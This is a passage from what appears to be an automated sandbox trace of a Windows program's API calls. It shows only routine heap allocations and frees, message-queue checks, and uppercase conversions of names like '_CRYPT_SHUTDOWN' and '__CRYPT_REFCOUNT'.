dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0163.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0163.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0163.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0163.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0163.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0163.137] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0163.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0163.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0163.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0163.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0163.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0163.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0163.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0163.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0163.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0163.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0163.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0163.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0163.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0163.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0163.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0163.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0163.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0163.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0163.138] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0163.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0163.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0163.138] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0163.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0163.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0163.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0163.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0163.138] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0163.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0163.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0163.138] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0163.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0163.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0163.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0163.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0163.139] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0163.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0163.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0163.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0163.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0163.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0163.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0163.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0163.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0163.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0163.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0163.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0163.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0163.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0163.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0163.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0163.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0163.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0163.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0163.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0163.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0163.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0163.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0163.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0163.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0163.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0163.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0163.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0163.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0163.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0163.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0163.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0163.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0163.140] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0163.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0163.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0163.140] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0163.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0163.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0163.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0163.140] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0163.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0163.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0163.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0163.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0163.141] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0163.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0163.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0163.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0163.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0163.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0163.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0163.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0163.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0163.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0163.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0163.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0163.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0163.141] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0163.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0163.142] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0163.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0163.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0163.142] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0163.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0163.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0163.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0163.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0163.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0163.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0163.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0163.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0163.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0163.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0163.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0163.142] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0163.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0163.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0163.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0163.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0163.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0163.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0163.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0163.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0163.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0163.143] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0163.143] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0163.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0163.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0163.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0163.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0163.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0163.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0163.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0163.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0163.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0163.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0163.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0163.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0163.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0163.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0163.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0163.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0163.144] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0163.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0163.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0163.144] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0163.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0163.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0163.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0163.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0163.146] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0163.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0163.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0163.146] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0163.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0163.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0163.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0163.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0163.147] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0163.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0163.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0163.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0163.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0163.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0163.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0163.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0163.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0163.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0163.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0163.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0163.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0163.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0163.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0163.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0163.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0163.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0163.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0163.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0163.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0163.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0163.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0163.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0163.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0163.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0163.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0163.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0163.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0163.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0163.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0163.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0163.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0163.148] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0163.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0163.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0163.148] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0163.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0163.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0163.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0163.148] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0163.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0163.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0163.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0163.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0163.149] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0163.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0163.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0163.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0163.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0163.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0163.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0163.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0163.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0163.149] 